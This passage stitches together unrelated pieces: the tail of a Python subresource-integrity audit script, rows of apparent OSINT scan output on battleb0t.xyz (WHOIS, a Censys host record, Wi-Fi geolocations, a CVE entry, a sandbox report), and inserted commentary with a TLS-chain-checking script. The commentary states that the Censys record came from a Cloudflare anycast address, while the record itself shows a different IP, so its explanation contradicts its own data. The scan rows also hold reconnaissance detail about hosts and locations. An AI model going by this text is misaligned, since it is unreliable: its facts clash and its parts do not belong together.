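        if parts.scheme == "http":
            findings.append((url, "plain-http"))
        if not integrity:
            findings.append((url, "missing-sri"))
        elif crossorigin is None:  # crossorigin="" is valid and means anonymous
            findings.append((url, "sri-without-crossorigin"))
    return findings


def sri_hash(body: bytes, algorithm: str = "sha384") -> str:
    """Value for integrity="..." computed from a reviewed copy of the resource."""
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode()}"


if __name__ == "__main__":
    for url, code in audit_subresources(PAGE_HEAD):
        print(f"{url}\n    {REASONS[code]}")
```

The integrity attribute on the http:// jQuery tag does still pin the file's content, so a network attacker cannot swap the script without the browser rejecting it; the remaining problems are that the hash is only as trustworthy as the page that carries it, and that an https deployment of this page would block the request outright as mixed content.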
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.96 | 87.248.157.102 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.110.153 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.167): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 188.114.97.0/24 |
| 2023-05-12 02:59:45 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | battlebot.xyz |
| 2023-05-12 03:05:41 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nuke.battleb0t.xyz |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.237): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:54 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.99 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) | 37.780462,-122.390564 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | www.donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
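The Censys record above was collected from 188.114.96.1, a Cloudflare anycast address, so the certificate it carries (donation.ecash-pay.com) is whatever zone the edge presented without SNI and says nothing about the scan target; the chain also tops out at the ISRG Root X1 cross-sign from DST Root CA X3, which Let's Encrypt still served in 2023 for old-Android clients. The following Python is an added example, not SpiderFoot or Censys code: it walks the `tls.certificates` structure in the row above (copied into the block with only the fields it needs), checks that each chain element actually signs the one before it, reports which anchor the server implied, and tests whether the leaf covers a hostname.

```python
"""Walk a Censys-style ``tls.certificates`` record: confirm the chain links
up, report the implied trust anchor, and check hostname coverage.
Added example; the record below is a hand-trimmed copy of the row above."""

# Constructed from the Censys row above (188.114.96.1:443); only the
# fields this check needs are kept.
CENSYS_TLS = {
    "chain": [
        {"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1",
         "subject_dn": "C=US, O=Let's Encrypt, CN=R3",
         "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"},
        {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3",
         "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1",
         "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"},
    ],
    "leaf_data": {
        "subject_dn": "CN=donation.ecash-pay.com",
        "issuer_dn": "C=US, O=Let's Encrypt, CN=R3",
        "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"],
        "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16",
    },
    "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16",
}


def chain_breaks(tls: dict) -> list:
    """Return the problems found walking leaf -> intermediates -> top.

    Censys lists ``chain`` starting with the certificate that signed the
    leaf; each entry's subject must equal the previous entry's issuer.
    """
    problems = []
    leaf = tls["leaf_data"]
    if leaf["fingerprint"] != tls.get("leaf_fp_sha_256"):
        problems.append("leaf fingerprint does not match leaf_fp_sha_256")
    expected_issuer = leaf["issuer_dn"]
    for i, cert in enumerate(tls["chain"]):
        if cert["subject_dn"] != expected_issuer:
            problems.append(
                f"chain[{i}] subject {cert['subject_dn']!r} "
                f"does not match expected issuer {expected_issuer!r}")
        expected_issuer = cert["issuer_dn"]
    return problems


def top_of_chain(tls: dict) -> str:
    """Issuer DN of the last chain element: the anchor the server implied.
    Here that is the DST Root CA X3 cross-sign, not ISRG Root X1 itself."""
    return tls["chain"][-1]["issuer_dn"]


def leaf_covers(tls: dict, hostname: str) -> bool:
    """RFC 6125-style match: exact SAN or a single-label wildcard."""
    hostname = hostname.lower().rstrip(".")
    for name in tls["leaf_data"]["names"]:
        name = name.lower()
        if name == hostname:
            return True
        if name.startswith("*.") and "." in hostname:
            # "*.example.com" matches "a.example.com" but not "a.b.example.com"
            if hostname.split(".", 1)[1] == name[2:]:
                return True
    return False
```

Run `chain_breaks(CENSYS_TLS)` on the row's data and it returns an empty list; `leaf_covers(CENSYS_TLS, "battleb0t.xyz")` is false, which is the practical point: a certificate harvested from a shared edge IP must not be attached to the domain being investigated unless the leaf names cover it.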
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:36:56:5A) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | gfycat (Category: misc)<br>https://gfycat.com/@login | login |
| 2023-05-12 02:45:34 | DNS SPF Record | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | v=spf1 include:_spf.mx.cloudflare.net ~all | battleb0t.xyz |
| 2023-05-12 02:59:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.74.170.74', u'104.16.88.20', u'104.21.63.54'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://www.trustsign.com.br/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "o.ss2.us"\n "ocsp.pki.goog"\n "crl.rootg2.amazontrust.com"\n "crl.pki.goog"\n "crls.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar87F.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3764"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_eb4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_eb4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_eb4_IE_EarlyTabStart_0xdd0_Mutex"\n "IsoScope_eb4_ConnHashTable<3764>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3764"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "184.31.135.120:80"\n "142.250.217.72:443"\n "142.250.217.106:443"\n "104.16.88.20:443"\n "108.139.0.36:443"\n "104.21.63.54:443"\n "108.138.245.11:80"\n "142.250.217.99:80"\n "108.138.245.125:80"\n "142.251.33.110:80"\n "108.139.0.48:80"\n "108.138.245.30:80"\n "108.139.0.178:80"\n "216.239.32.178:443"\n "142.250.217.99:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab86E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVQ_1_.woff" has type "Web Open Font Format TrueType length 20712 version 1.1"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002908]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003764]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002908]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002908]\n "7e80dcacf1_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "~DF6E9EB864F8E8C92C.TMP" has type "data"- Location: [%TEMP%\\~DF6E9EB864F8E8C92C.TMP]- [targetUID: 00000000-00003764]\n "YMKUF9Q6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YMKUF9Q6.txt]- [targetUID: 00000000-00003764]\n "CPM6V2NP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPM6V2NP.txt]- [targetUID: 00000000-00002908]\n "IGBW5PPN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IGBW5PPN.txt]- [targetUID: 00000000-00002908]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no 
